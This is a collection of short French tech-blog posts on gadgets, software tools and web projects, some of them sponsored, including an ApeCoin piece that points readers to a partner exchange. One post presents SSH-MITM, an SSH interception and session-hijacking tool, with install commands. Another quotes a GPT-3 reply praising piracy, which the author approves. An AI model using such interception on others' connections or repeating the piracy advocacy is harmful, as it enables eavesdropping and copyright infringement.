Chaque mission se compose de vidéos, de photos et surtout des heures et des heures de communications audio entre le centre de contrôle, les astronautes…etc.

Si le confinement vous a réussi, pourquoi ne pas faire le plein de choses à grignoter, un petit pack d’eau, et une couche pour adulte afin de partir en immersion totale durant plusieurs jours, du décollage au retour sur Terre.

Évidemment, vous pouvez aller là où ça vous intéresse à l’aide d’une timeline. Et vous pourrez lire toutes les retranscriptions des conversations des astronautes.

Bref, un vrai bon moyen de revivre ce moment historique avec un maximum de détails et d’informations techniques.

C’est par ici.

Et dans le même style mais en plus épuré et sans vidéo, il y a ce site qui vous permet de revivre les discussion et les déplacements de Neil Armstrong et Buzz Aldrin à la surface de la Lune. Il y a même le coup de fil de Nixon.

Ça vous dirait d’apprendre à fabriquer un Mini Mac comme celui-ci ?

Imprimé en 3D, ce mini Mac à l’ancienne dissimule en réalité un Raspberry Pi Zero accompagné d’un peu de matériel comme un écran LCD, pour y faire tourner un émulateur macOS.

Plusieurs modèles (STL) sont dispo pour faire aussi bien un Mac Plus, Mac SE, Mac SE30 ou le Mac Classic et évidemment, toutes les explications techniques, les fichiers et les logiciels sont fournis sur le site Instructables.

Je vous laisse avec une démo de la bestiole. Il y a même le son. Franchement, ça fait envie et après avoir lu le tuto, ça n’a pas l’air si compliqué que ça à faire.

Afin que vos enfants ne deviennent pas les incultes scientifiques de demain comme le sont bon nombre d’adultes aujourd’hui, il faut savoir les intéresser aux sciences.

Et pour cela, rien de mieux que de passer par l’expérience ! C’est ce que propose le site CurioKids qui propose des dizaines d’expériences scientifiques simples à réaliser chez soi.

Pas besoin de beaucoup de matériel, en tout cas, rien de compliqué à trouver, et bien sûr toutes les explications techniques et scientifiques pour réaliser l’expérience et surtout comprendre le phénomène.

Si cela vous intéresse pour les mercredis après-midi ou les week-ends pluvieux, c’est par ici.

Hier, je vous parlais bande dessinée, mais pour faire une bonne BD ou un bon film, il faut avant tout un bon scénario. Et c’est là qu’entre en scène l’Association des Lecteurs Anonymes qui a pour mission de faire reconnaître et respecter les métiers de lecteur de scénarios et consultants.

Écrire un scénario quand on en l’a jamais fait, c’est très difficile. On ne connait pas les codes, la manière de présenter les dialogues, les passages descriptifs…etc.

Alors quoi de mieux pour se former que de commencer à lire les scénarios des autres. Et c’est là que l’association des Lecteurs Anonymes entre en jeu avec la mise à disposition de tous d’une scénariothèque contenant des dizaines de scénarios de films majoritairement français à télécharger au format PDF.

Que vous soyez lecteur ou simplement un créatif cherchant à comprendre comment faire un bon scénario, la scénariothèque vous fera surement plaisir. En tout cas c’est super que des passionnés mettent à disposition ce genre de contenus difficiles à trouver. Il faut également remercier les auteurs de scénarios qui partagent sans rien attendre en retour leurs scénarios. Je trouve ça vraiment chouette et inspirant.

Bonne lecture à tous !

Dans cette vidéo mise en ligne en 2014, Bruno Heitz, illustrateur et auteur de bandes dessinées, nous explique les règles et principes d’une bande dessinée.

Un cours particulier très intéressant qui dure un peu moins de 20 min et qui donnera à vous ou à vos enfants, les bases à connaître pour concevoir une bande dessinée.

Il y a évidemment encore beaucoup d’autres choses à savoir, mais c’est une merveilleuse introduction, douce et pédagogique qui réveillera peut-être quelques vocations.

Merci à Laurent pour le partage.

Si vous pratiquez AWS, saviez-vous qu’avec ce script python nommé AutoVPN, vous pouviez facilement créer des points d’accès OpenVPN dans n’importe quelle région AWS ?

La création d’un point d’accès OpenVPN avec ce script ne vous prendra que quelques minutes et créera automatiquement les groupes qui vont bien pour vos accès sécurisés. Pour ce faire, AutoVPN démarre une instance EC2 et configure OpenVPN. Dès l’installation et la configuration terminée, un fichier de config OpenVPN est téléchargeable et prêt à être utilisé.

Une autre fonction permet de voir également quelles sont les instances en cours d’exécution et dans quelles régions AWS.

AutoVPN permet de spécifier le type d’instance dont vous avez besoin, de générer des paires de clés SSH, de spécifier une IAM personnalisée…etc.

C’est super pratique pour créer des points d’accès en fonction de la demande et pouvoir ensuite les supprimer comme si de rien n’était.

Si vous voulez en savoir plus, toute la documentation et le script se trouvent sur la page Github.

Si vous utilisez des services de vidéo en ligne comme Netflix, Disney+, YouTube, Amazon Prime, Dailymotion ou encore Vimeo et que vous aimez avoir les sous-titres, peut-être êtes-vous un peu déçu par les sous-titres par défaut proposés par toutes ces plateformes.

Parfois la langue voulue n’y est pas. Parfois il n’y a pas de sous-titres. Parfois ces derniers sont mauvais ou désynchronisés. Et si vous avez des besoins spécifiques en matière de taille ou de couleur des textes de sous-titres, et bien c’est fichu.

Heureusement, il existe Substital, une extension pour Chrome et Firefox qui permet d’ajouter des sous-titres d’OpenSubtitles ou depuis un fichier ZIP ou SRT directement sur tous ces services d’un seul clic.

Plusieurs options se rajoutent ainsi au player de Netflix, YouTube, Disney+…etc. pour vous proposer de modifier la taille de la police, la couleur, le fond, la transparence et surtout la synchronisation.

C’est royal non ?

À télécharger ici.

– Article en partenariat avec LiteBit . Cet article n’est en aucun cas un conseil en investissement, mais simplement la présentation d’un projet technique autour de la blockchain –

Un petit article qui sort des clous aujourd’hui pour vous parler d’un projet crypto qui fait grand bruit depuis quelques jours.

Présentation du projet

Si vous avez une connexion Internet, vous connaissez forcement les NFTs de Bored Ape Yacht Club (BAYC), ces images de singes que tous les artistes et personnes fortunées s’arrachent à plusieurs millions de dollars.

Yuga Labs, la société derrière le projet a non seulement levé plus de 450 millions de dollars, mais a également acheté les licences d’autres collections NFTs comme les Crypto Punks et les Meebits.

Et surtout il y a quelques jours, ils ont lancé leur cryptomonnaie : Le ApeCoin disponible sur LiteBit !

Adossé à une DAO (Organisation Autonome Décentralisée), cette cryptomonnaie va permettra à la communauté de BAYC d’exercer une certaine gouvernance sur les projets de Yuga Labs mais également de participer aux prochains jeux Play To Earn développés par Yuga Labs et Animoca Brands.

Ces jeux et le ApeCoin sont reçus très positivement par les propriétaires de BAYC qui vont enfin pouvoir exploiter leur singe de manière plus concrète au travers des services de Yuga Labs mais également avec de la prise de décision via la DAO.

Toutefois, cela reste une course de vitesse pour Yuga Labs qui doit rapidement consolider son écosystème avant que des propriétaires de NFT BAYC n’exploitent l’image et la marque de leurs propres NFTs pour lancer des jeux ou des partenariats à eux.

Pourquoi ApeCoin est un projet intéressant ?

Pour le moment, il n’y a pas encore d’utilité à ce token. Donc tout ceci reste un pari sur l’avenir. Certes Yuga Labs a énormément d’argent, et une communauté gigantesque mais ils doivent encore créer de toute pièce l’écosystème qui fera la joie de cette communauté.

Ce qui est positif, c’est que Yuga Labs semble parfaitement savoir où ils vont. Leur stratégie consiste à attirer encore plus de possesseurs de NFTs avec d’autres collections moins onéreuses que les BAYC. Ils souhaitent également offrir la possibilité aux gens de créer leurs propres personnages NFTs dans leurs futurs jeux et évidemment proposer une batterie de services utilisant leur ApeCoin.

Vous l’aurez compris, Yuga Labs a prévu de mettre le paquet sur le développement de son écosystème (ils vont même proposer un SDK) tout en continuant à pousser à la hype leurs singes avec l’aide des artistes qui en achètent.

Reste à savoir s’ils arriveront à réaliser tous leurs objectifs avant que leur communauté ne se lasse. Et pour le savoir, rien de plus simple : Il suffira de surveiller durant les prochains mois / prochaines années leur blockchain pour voir si le nombre de transaction reste en croissance.

Le token ApeCoin

ApeCoin est un token ERC-20 qui permettra à ses détenteurs de participer à la DAO d’ApeCoin.

Disponible à 1 milliard d’exemplaires, ce sera également un jeton d’utilité qui servira à toutes les transactions liées à l’écosystème BAYC.

En possédant les droits de 3 énormes collections de NFT (BAYC, Cryptopunk et Meebits), Yuga Labs dispose d’une gigantesque communauté. Et en créant un maximum d’utilité pour leur jeton, ils espèrent faire du ApeCoin une monnaie de choix qui sera utilisée dans l’économie de futurs jeux P2E, dans la vente d’objets numériques (NFTs) ou pourquoi pas dans un « metaverse » orienté gaming.

Il n’est pas non plus exclu que Yuga Labs rachète à l’avenir d’autres collections de NFTs pour augmenter encore plus la taille de sa communauté.

C’est vraiment une page blanche qui est en train de s’écrire sous nos yeux, et je trouve ça passionnant.

Quel est le cours du ApeCoin ?

Où acheter des ApeCoin ?

Attention, sachez qu’il y a 2 ApeCoin qui existent. Le véritable token ERC-20 sorti par Yuga Labs et un autre token BEP-20 qui n’a rien à voir avec les NFTs de BAYC. Alors pour être sûr de ne pas vous tromper si vous désirez en acheter, je vous recommande vivement de passer par LiteBit.

C’est l’un des sites les plus fiables et simples à utiliser pour effectuer un achat crypto. Je vous prends même par la main pour vous montrer comment cela se passe dans mon article et ma vidéo « À la découverte de LiteBit » .

Acheter APECoin sur la plateforme LiteBit !

À bientôt pour la présentation d’un autre projet crypto !

Si vous vous intéressez un peu à la technologie et aux jeux vidéos, et que vous ne connaissez pas l’histoire extraordinaire derrière la Xbox, soyez joie !

Car la chaine Youtube XBox a mis en ligne une véritable série de 6 épisodes qui retrace les débuts peu glorieux de la console de Microsoft jusqu’à son succès mondial et a une compétition acharnée notamment avec Sony.

Bon visionnage à tous !

Actuellement, lorsque nous nous connectons à un site web, nous utilisons majoritairement le protocole HTTP afin d’aller chercher ce qui nous intéresse sur un serveur. Il existe cependant un autre protocole de diffusion baptisé IPFS (InterPlanetary File System) qui fonctionne sur un principe de peer to peer.

Edit du 22/03/2022 : J’ai réalisé une vidéo tutorial pour les gens qui me soutiennent sur Patreon. Elle est maintenant disponible pour tous ici.

L’idée est ambitieuse et Kyle Drake, l’inventeur de IPFS, explique dans ses vidéos que son protocole permet d’éviter les points uniques de défaillance. Il s’agit d’un système de fichier versionné (Git) dont les blocs sont partagés en P2P (Kademlia + BitTorrent), ce qui rend le web vraiment décentralisé.

En gros, il applique le principe du téléchargement bittorrent à tout ce qui constitue le web. Si vous consultez une page web en IPFS, les images, les CSS, le HTML et les JavaScript seront récupérés bloc par bloc chez d’autres utilisateurs d’IPFS (ou CDN connectés en IPFS). Cela rendra le chargement de la page plus rapide et il sera impossible de la supprimer ou de la censurer si on n’en est pas le propriétaire.

IPFS est un projet open source qui est d’ores et déjà disponible en version alpha et des API pour tous les langages sont disponibles, ce qui vous permettra d’implémenter ce protocole dans vos projets.

• Installer IPFS Alpha
• Configurer IPFS
• Passer en ligne
• Autres exemples

Voici une démo en vidéo de ce que ça peut donner en conditions réelles :

Si par exemple Mozilla s’emparait de cette techno, ça pourrait commencer à devenir passionnant ! (Edit 22/03/2022 : Brave l’a fait !)

Vous trouverez plus d’infos sur le site d’IPFS.

Article initialement paru le 06/01/2016 – Mis à jour le 22/03/2022

Voici un outil libre qui vient se poser comme une alternative à Balena Etcher, Rufus et la commande dd.

Il s’agit d’USB Imager, un outil hyper minimaliste, avec une interface graphique qui permet d’écrire des images disques compressées sur des clés USB ou des disques durs. L’intérêt d’USB Imager, c’est qu’un débutant peut facilement le prendre en main. Il est également cross-plateforme (macOS, Linux, Windows, et OS pour Raspberry Pi et vérifie l’intégrité de l’image une fois copiée.

L’outil est également capable de produire une image compressée à partir d’une clé USB. Pratique pour les sauvegardes ou les copies.

À découvrir ici.

Au détour d’un tour sur Reddit lors de mon Twitch, je suis tombé (merci Nobody00x1) sur ce message d’un Internaute qui a demandé à GPT-3, l’intelligence artificielle d’OpenAI, les avantages du piratage face à des solutions d’abonnements comme Netflix ou Disney+

Et la réponse est ma foi, très juste…

Comme quoi, même les programmes informatiques ne s’y trompent pas.

Si vous avez séché les cours d’anglais de Mme Marquetti, je vous mets la trad ci-dessous :

Il y a plusieurs raisons pour lesquelles le piratage est préférable aux abonnements payants comme Netflix. Premièrement, les abonnements payants nécessitent une carte de crédit ou une autre forme de paiement qui permet de remonter jusqu’à l’abonné. Cela donne au service d’abonnement la possibilité de suivre ce que vous regardez et quand vous le regardez. Deuxièmement, les abonnements sont souvent plus chers que les versions pirates du même contenu. Troisièmement, les abonnements payants comportent généralement des publicités, alors que les versions pirates n’en comportent pas. Enfin, le contenu piraté est souvent de meilleure qualité que la version payante, car il provient souvent de copies Blu-ray ou DVD.

Après, avec la loi sur la copie privée, certains vont même jusqu’à oser dire que c’est tout simplement un droit au piratage 🙂

JS-DOS est comme son nom l’indique un projet de bibliothèque JavaScript qui vous permet de faire fonctionner un programme DOS dans un navigateur sans trop vous prendre la tête.

Une fois en place dans votre projet vous pourrez alors lancer rapidement un programme DOS rapidement :

Dos(element).run("game.jsdos")

Des couches emulators et emulators-ui vous permettront également d’utiliser l’API de JS-DOS et de faire tourner l’émulation dans différents environnements ou encore de concevoir votre propre lecteur de programmes DOS.

C’est vraiment des outils et une API qui vous permettront soit de monter votre propre site comme DOS Zone ou votre propre application mobile d’émulation. Mais je pense également à des outils pros encore sous DOS et encore utilisés dans certaines entreprises, qui pourraient de cette manière être mis en ligne sur un serveur, évitant ainsi des installations bordéliques sur des machines récentes.

Tellement de possibilités.

Quoiqu’il en soit, JS DOS est disponible sur ce site. Amusez-vous bien et surtout, pensez à lire la doc.

Hier je vous parlais d’un NAS USB et aujourd’hui, je vais plutôt vous présenter un logiciel qui s’appelle QRCP et qui permet simplement en ligne de commande de transférer des fichiers d’une machine à l’autre.

Comment ?

Et bien à l’aide d’un QR Code. En gros, QRCP lie un serveur web à l’adresse de votre interface réseau Wi-Fi sur un port aléatoire. Ce serveur sert le contenu et disparaît lorsque le transfert est terminé.

QRCP peut également être utilisé pour recevoir des fichiers. Dans ce cas, il affiche une page de téléchargement et gère l’upload.

L’intérêt de QRCP c’est qu’il génère un QR Code qui peut ensuite être scanné par n’importe quel appareil. L’URL encodée dans le QR est alors ouverte et le contenu peut commencer à être téléchargé.

À découvrir ici pour l’installer sous Windows, Linux ou encore macOS.

Aujourd’hui, je vous propose un bricolage très sympa à base de Raspberry Pi Zero. L’idée de ce projet, c’est créer soit même un NAS qui tient sur une clé USB.

Vous mettez des fichiers sur une carte micro SD, vous alimentez le NAS par son port USB et celui-ci lance un réseau wifi nommé SUBZero. Ensuite, n’importe qui qui s’y connecte peut alors ouvrir un navigateur et accéder aux fichiers via l’adresse https://192.168.1.1.

C’est super pratique, car ça permet sans avoir de connexion Internet et sans passer par le cloud, de mettre à disposition de tous des fichiers.

Évidemment, ce n’est pas en vente à la FNAC, mais si vous avez un fer à souder, vous retrouverez tous les détails du montage et le code sur cette page.

J’sais pas si vous utilisez Kodi pour tout ce qui est media center à la maison, mais si c’est le cas, voici un plugin Kodi qui devrait vous plaire.

Il s’agit d’un plugin non officiel qui permet de profiter de Netflix sur votre Kodi. Ce plugin vous donne accès à tous les profils, aux listes les plus utilisées comme les sorties récentes, les originaux Netflix, une liste des bandes annonces, la synchro avec le statut du visionnage (pour reprendre là où vous vous êtes arrêté), l’export et la synchro de votre bibliothèque Kodi avec Netflix ou encore le support des résolutions 1080p et 4K et j’en passe…

Pour profiter de ce plugin, vous devrez avoir Kodi 19 ou supérieure, l’add-on InputStream Adaptative, la lib Python Pycryptodome, l’add-on InputStream Helper, la lib Widevine CDM et suivre la procédure d’install qui se trouve sur cette page.

Évidemment, on est sur un plugin non officiel donc attendez-vous à ce que ça ne fonctionne pas à tous les coups. Il suffit que Netflix change un petit truc de son côté pour casser le plugin et vous devrez attendre que les développeurs de ce plugin le mettent à jour.

Si vous êtes une star de l’impression 3D, cet article ne vous sera pas très utile. Par contre, si vous débutez et que vous galérez un peu, voici une page à bookmarker d’urgence.

Cette page recense tous les problèmes classiques qu’on peut rencontrer lors d’une impression 3D :

Impressions qui forment des coussinets, les couches inférieures qui s’évasent, la formation de cercles irréguliers, les petits fils qui dépassent de partout, des couches décalées…etc., etc. Il y a beaucoup d’exemples et évidemment, si vous cliquez sur l’un d’entre eux, vous aurez toutes les explications qu’il faut sur le phénomène ainsi que des solutions pour le résoudre.

Cette page est très orientée pour les Ultimaker 2 mais si vous avez un autre modèle d’imprimante, ça peut quand même vous aider, ou au moins vous donner quelques pistes à creuser.

À découvrir ici.

Edit : Raphael, lecteur de Korben.info m’a également envoyé ce lien (en français) avec d’autres problèmes d’impressions 3D plus classiques que vous pouvez résoudre. Merci à lui.

— En partenariat avec Semji —

Le référencement c’est pas forcément un truc que je pratique au quotidien. Il y a beaucoup de paramètres à prendre en compte, et ça demande beaucoup de temps et des outils appropriés. Et pourtant, le SEO c’est quand même quelque chose de primordial lorsqu’on fait du web.

Il y a quelques mois, les gens de Semji m’ont approché pour que je teste leur solution de SEO et comme je l’ai trouvé vraiment bien, je vous fais un retour sous la forme d’un article.

Semji est une plateforme dédiée au référencement multilingue qui offre de nombreux avantages.

Cela commence par une détection des contenus SEO à fort potentiel. En effet, après analyse de votre site et de son référencement existant, Semji est capable de vous indiquer les pages à retravailler en priorité. Ce n’est pas forcément évident de savoir par quoi commencer surtout lorsqu’on a des milliers de pages web, mais grâce à Semji, vous saurez instantanément quels sont les contenus les plus stratégiques de votre site.

Ces contenus sont ceux qui offrent un excellent gain SEO. Cela signifie qu’une petite optimisation, c’est un gros paquet de trafic en plus. Cela se présente sous la forme d’une liste de pages avec un potentiel de clics élevés sur un mot clé précis.

Ainsi à partir de cette liste, vous pouvez ajouter un contenu à retravailler dans votre planning pour l’assigner à l’un de vos collaborateurs ou vous-même. Ce système permet d’organiser facilement et rapidement un planning éditorial entre plusieurs personnes.

Vient ensuite l’édition du contenu en elle-même. Après une analyse de la page, Semji est ainsi capable de vous suggérer la meilleure thématique en rapport avec votre contenu, c’est-à-dire un mot clé principal ainsi qu’un score sur 100.

C’est ce score que vous allez pouvoir améliorer en modifiant le contenu de votre page selon les indications de Semji. Et Semji, des indications, il en a plein à donner. De la balise titre, aux mots clés à insérer dans le contenu, en passant par la longueur du texte, sans oublier le maillage interne et externe du site avec les bons liens. Tout y passe.

Votre page est ainsi comparée avec des pages concurrentes positionnées avant la vôtre dans les moteurs de recherche (dans Google quoi…) et le petit jeu va consister à en faire plus et mieux pour couvrir au maximum la thématique de votre page.

Je me suis amusé à retravailler plusieurs contenus de cette manière et c’est un vrai plaisir. C’est un peu comme un jeu, où il faut faire preuve d’imagination pour proposer à la fois un contenu que Google va prendre plaisir à digérer, mais également un contenu que vos lecteurs humains apprécieront. Semji propose d’ailleurs un véritable éditeur dans lequel vous pouvez écrire, placer vos balises titres, vos liens…etc., et votre score évoluera en temps réel.

Faire ce travail sans outil n’est pas simple, mais heureusement, avec Semji, ça devient un jeu d’enfant.

Semji est très utile pour retravailler du contenu existant, mais peut également être utilisé pour concevoir son contenu de A à Z. L’outil propose par exemple une fonctionnalité capable de vous proposer des idées de contenu en rapport avec le thème de votre choix.

Et surtout, une fois que le contenu est retravaillé et mis en ligne sur votre site, au bout de quelques heures ou jours, il sera à nouveau analysé par Google qui choisira de mieux le positionner dans ses résultats.

Et toute cette évolution, vous pourrez la suivre grâce à des rapports qui vous indiqueront l’évolution des clics mensuels sur vos pages, la position dans l’index de Google ou encore le volume de pages traitées. Évidemment, si vous êtes sur un secteur concurrentiel, c’est le genre d’outil qu’il vous faut pour vous battre à armes égales avec les sociétés qui embauchent des référenceurs à temps plein.

Je trouve que c’est super agréable de voir les effets positifs de son travail sur quelque chose d’aussi abstrait que le référencement. C’est vraiment ça que propose Semji : transformer une discipline abstraite en quelque chose de concret avec à la fois des conseils et du suivi.

Je manque encore de temps pour exploiter cet outil à fond, surtout que je me prends vite au jeu et que j’aurai besoin d’une journée complète par semaine à consacrer à mon SEO. Mais sur le peu que j’ai retravaillé, j’ai pu voir quand même de bons résultats. Faudrait vraiment que je m’y remette ou que j’embauche une personne à temps plein sur ça :-).

En tout cas, j’ai été agréablement surpris par la simplicité de prise en main et par le côté addictif de l’optimisation SEO qui devient (et je me répète) un vrai jeu. L’optimisation SEO c’est passionnant et alors si en plus, on est pris par la main avec un outil comme celui-là, c’est la folie !

Si ça vous dit de tester, sachez que les équipes de Semji peuvent votre faire une démo ou vous ouvrir un compte de test gratuit.

D’où vient-on ? Quand on y réfléchit, c’est dingue… Tout ce qui vit à la surface de cette planète, mais également les étoiles, les comètes et éventuellement d’autres formes de vie loin dans l’Univers s’est constitué à partir d’une explosion géante : Le Big Bang.

En tout cas, c’est jusqu’à ce point que les scientifiques ont pu remonter. Quoiqu’il en soit pour le moment, la compréhension et la logique de tout cela nous dépassent clairement. Il suffit de grattouiller un peu de physique quantique ou des sujets comme la formation du temps pour être encore plus déboussolé.

Mais peu importe, tant qu’on kiffe.

Et ce qu’on va kiffer aujourd’hui c’est cette superbe application iPhone réalisée par le CERN qui vous emmènera dans un voyage en réalité augmentée pour assister comme si vous y étiez à la naissance de l’univers et à son évolution jusqu’à nous.

C’est tout en anglais, mais vous pouvez activer les sous-titres (en anglais aussi). Le son est bien planant, bien immersif, alors mettez un casque audio. Et ensuite, déplacez-vous parmi les atomes, parmi les étoiles…etc.

Ça vous fera son petit effet. En tout cas moi j’ai kiffé.

Maintenant que les choses sont dites, faut que je vous dise la vérité : L’Univers est une illusion dans laquelle nous évoluons en tant qu’ondes et cristallisation d’ondes, c’est-à-dire en tant que matière. Il est à la fois fini et infini et est relié à une grappe d’autres univers. De plus, le temps n’existe pas vraiment. Enfin si, mais localement puisqu’il est là où il y a de la gravité. D’ailleurs, je dis « il », mais sachez-le, l’Univers est une « elle ». Je vous rassure, rien à voir avec Dieu, elle est beaucoup plus sympa. Enfin, tout ce que vous dit là doit rester entre nous, car on est peut-être dans une simulation informatique mise au point par des aliens qui essayent de comprendre comment on a fait pour réussir à détruire notre planète il y a des milliards de milliards d’années. Et s’ils apprennent que j’ai tout capté, ils vont rebooter leur PC cosmique.

Sinon, ouais c’est de la bonne.

Allez, bonne balade dans l’Univers les amis !

Si vous êtes *un peu* gamer, vous connaissez sans doute le fabricant de matériel Razer. Mais si, ces jolis claviers, ordinateurs ou encore souris resplendissants comme des Autobots dans une Pride.

Le truc c’est que le matos de gamers, ça ne fonctionne en général que sous Windows… Les Linuxiens étant mis de côté, ils ont lancé un projet nommé OpenRazer qui n’a d’autre but que de porter les drivers de Razer sous Linux.

OpenRazer se compose donc de pilotes non officiels pour le matériel Razer ainsi que tous les démons nécessaires pour faire fonctionner le matériel et le configurer. Chouette initiative non ?

Ainsi, avec ce projet, vous pourrez faire fonctionner vos claviers, touchpads, souris, tapis souris (oui oui…), casques et autres engins de la marque Razer et vous pourrez même scripter leur comportement avec un peu de Python grâce à une API.

Allez jeter un œil au site d’OpenRazer pour vite découvrir si votre matériel est supporté.

— Article en partenariat avec pCloud —

Depuis que je vous ai fait découvrir pCloud il y a quelques années, le service a bien évolué. Pour rappel, pCloud est une solution de stockage en ligne que j’utilise depuis des années et que j’aime beaucoup pour plusieurs raisons.

Les fonctionnalités de pCloud

Tout d’abord en termes de fonctionnalités, je trouve pCloud beaucoup mieux armé que ses concurrents Dropbox ou Google Drive. En effet, ce service permet avant tout de stocker des fichiers dans le cloud. On peut créer des dossiers pour ranger tout ça, faire des recherches, filtrer les fichiers par format et si vous voulez supprimer un fichier, celui-ci ira dans une corbeille et sera récupérable dans les 15 jours. Une bonne sécurité pour les gens distraits comme moi.

La taille des fichiers que vous pouvez envoyer sur pCloud est de … illimité. Vous pouvez y mettre tout ce que vous voulez sans aucune limite d’upload ou de download. Évidemment, tout est accessible via l’interface web, mais également via des applications pCloud Drive dédiées pour Windows, macOS, Linux et bien sûr sous Android et iOS.

Ces applications permettent d’ailleurs de faire de la synchronisation de répertoires comme avec Dropbox. Ainsi vos fichiers stockés sur pCloud restent accessibles hors ligne sur votre ordinateur et tout est synchronisé entre tous vos appareils. La synchro se fait via Internet, mais peut également se faire directement via votre réseau local entre vos appareils.

pCloud propose également une fonctionnalité de sauvegarde pour les photos et les vidéos que vous prenez avec votre smartphone. C’est entièrement automatique. Vous prenez une photo et elle sera immédiatement envoyé dans le cloud de pCloud. Pratique pour ne plus perdre de souvenirs, même si vous détruisez votre smartphone ou si vous vous faites voler votre ordinateur.

Chaque fichier que vous envoyez sur pCloud profite également de différents niveaux de versioning. Si vous modifiez un document par erreur, vous pouvez remonter en arrière jusqu’à 15 jours de modifications avec la version gratuite de pCloud. Et de 30 jours à 1 an en fonction des options payantes que vous choisissez.

Si vous travaillez de manière collaborative avec d’autres personnes, sachez que tout ce que vous déposez sur pCloud pourra être partagé avec d’autres. Fichiers, répertoires, génération de liens directs…etc. pCloud est taillé pour le travail et la collaboration. Plus besoin de vous embêter à compresser des fichiers pour les faire rentrer dans un email. Un clic droit suffit pour copier-coller un lien qui pointera vers la donnée présente sur pCloud.

pCloud a fait de gros efforts concernant l’interface utilisateur. Le service et ses outils comme pCloud Drive sont simples à comprendre et à utiliser.

La souveraineté de pCloud

pCloud étant un service européen, il respecte évidemment les lois de confidentialité RGPD. Et comme la société est basée en Suisse, c’est la loi de ce pays qui s’applique. Vos données sont en sécurité dans des data center ultra sécurisé répondant aux normes et aux certifications nécessaires pour la conservation de données personnelles. Et en fonction de la région que vous choisissez, vos données seront stockées aux US à Dallas (Texas) ou au Luxembourg (Europe).

Si vous n’êtes pas à l’aise avec le fait que vos données aillent dans les mains des GAFAMs ou soient stockés sur le sol américain (coucou la NSA), vous allez adorer pCloud.

La sécurité de pCloud

Concernant la sécurité, au-delà de la qualité et de la sécurité des data centers, pCloud garantie la confidentialité des données à l’aide de chiffrement TLS / SSL. Les données sont également redondées sur minimum 3 serveurs différents et une option Crypto permet der créer un répertoire sécurisé de bout en bout dans lequel vous pourrez mettre tout ce qui a de la valeur pour vous. Les fichiers seront chiffrés localement depuis votre ordinateur avant d’être déposés sur les serveurs de pCloud et un mot de passe que vous seul connaissez vous sera demandé pour y accéder.

Ils organisent même un challenge pour cracker leur crypto contre 100 000 $ de récompense. Pour le moment, personne n’a réussi.

Le prix de pCloud

Concernant les tarifs de pCloud, vous pouvez tester le service gratuitement. Ainsi, sans rien débourser, vous avez le droit à 10 Go de stockage (Dropbox c’est que 2 Go…lol). Ensuite, en fonction de vos besoins, de stockage vous pouvez payer un abonnement au mois, à l’année ou illimité pour toute la vie. Vous pouvez choisir un forfait de 500 Go de stockage ou de 2 To.

Et si vous passez par ce lien, vous pouvez également profiter de 3 mois gratuits avec 500 Go de stockage offerts.

A l’année pour 500 Go, vous vous en tirerez pour 49,99 €. Et 99,99 € pour 2 To. Ce que je vous recommande vraiment, c’est de jeter un œil aux plans « à vie ». Moi c’est ce que j’ai. J’ai payé 350 € pour 2 To de stockage à vie et 2 To de liens partageables. Pensez également à rajouter 125 € pour l’option chiffrement de bout en bout à vie.

Ils ont également des offres business et famille qui pourraient vous convenir.

Conclusion

Voilà pour la présentation du service. Je suis content de voir que pCloud a évolué dans le bon sens. C’était déjà très sérieux à l’époque, mais maintenant avec les nouvelles fonctionnalités et l’ancienneté, on peut dire qu’on est sur un service de qualité digne de concurrencer les plus grands services de cloud personnels. Et les offres à vie, je ne comprends pas pourquoi ils les proposent encore, mais c’est extrêmement rare et en général, on ne regrette pas.

Si vous voulez en savoir plus sur pCloud et profiter de l’offre de 3 mois gratuits avec 500 Go, cliquez ici.

On le sait tous, les développeurs sont les pires feignasses de la Terre quand il s’agit d’écrire de la documentation. Heureusement, dans la lignée de CoPilot dont j’ai parlé ici, voici AI Doc.

AI Doc est une extension pour Visual Studio Code qui génère de la documentation. Vous surlignez une de vos fonctions ou une partie de votre code, vous cliquez sur le bouton « Generate Docs« . Si vous êtes sous Mac vous pouvez aussi utiliser la combinaison de touches : ⌘ + .

Et PAF, vous aurez un peu de doc simpliste, mais qui fera l’affaire.

Voici une démo en vidéo de la bestiole. Vraiment cool, j’adore !!

Et le plus beau, c’est que c’est sous licence libre ici.

Si vous faites de la sécurité informatique et plus particulièrement de l’audit ou de l’analyse de logiciels malveillants, je vous invite aujourd’hui à jeter un œil à SSH-MITM.

Comme son nom l’indique, SSH-MITM est un serveur Man In The Middle qui une fois installé permet de voir tout ce qui transite entre des machines dans le cadre de connexions SSH.

L’outil gère l’authentification avec clés publiques, le détournement de sessions et la manipulation de fichiers durant les transferts SCP / SFTP.

SSH-MITM peut être installé sous Linux avec la commande suivante, et sur les Android :

sudo snap install ssh-mitm

Vous pouvez également l’installer avec pip (package python) comme ceci :

pip install ssh-mitm

C’est évidemment à utiliser uniquement sur votre propre matériel dans un cadre de recherche. Ne faites rien d’illégal avec ça sinon, vous irez obligatoirement en prison. C’est sûr et certain ^^ !

SSH-MITM est disponible ici.

J’sais pas si vous êtes au courant, mais les lundi, mardi et jeudi, vous pouvez me retrouver sur Twitch dès 14h. Hé oui ! Alors, abonnez-vous pour ne rien rater (spoiler : je ne joue pas aux jeux vidéos) !

Mais bon, y’a pas que moi sur Twitch et il y a pas mal de contenus divers et variés. Et en fonction de vos goûts, ce n’est pas forcément simple de s’y retrouver. Et bien sûr, vous connaissez les algos : Twitch nous renvoie vraiment que ce qu’il veut en termes de résultats de recherche et ce n’est pas toujours ouf.

Heureusement, grâce à cet outil, vous pouvez chercher la chaine Twitch active de vos rêves avec un simple mot clé ou tout simplement filtrer par jeu, langue du streamer, type de streamer (affilié, partenaire…etc) voire classer tout ça par nombre de spectateurs.

L’outil est assez épuré pour ne pas dire laid, mais il vous rendra de fiers services pour retrouver tous les streams que vous aimez… même ceux avec des Jacuzzis ou je ne sais quelle autre sorcellerie 🙂

Le site propose également d’autres outils utiles aux streamers pour par exemple supprimer certains followers, gérer les bannissements du chat, gérer les clips ou les vidéos ou encore sauvegarder les VODs et les clips.

Si vous êtes sous macOS et que comme moi, vous passez pas mal de temps dans le terminal, je vous présente Fig.

Fig est un widget qui se greffe au terminal et qui permet d’ajouter des capacités avancées d’autocomplétion. Ainsi, au fur et à mesure que vous tapez, Fig fait apparaître des sous-commandes, des options et des arguments contextuels pertinents dans votre terminal.

Fig vous permet d’être encore plus rapide, et tout est personnalisable, aussi bien les suggestions, que les thèmes ou encore ajouter des scripts ou des outils en ligne de commande dans les menus d’autocomplétion.

C’est vraiment pratique.

Pour installer Fig, vous pouvez télécharger l’outil sur le site officiel ici ou tout simplement entrer la commande suivante dans votre terminal :

brew install fig

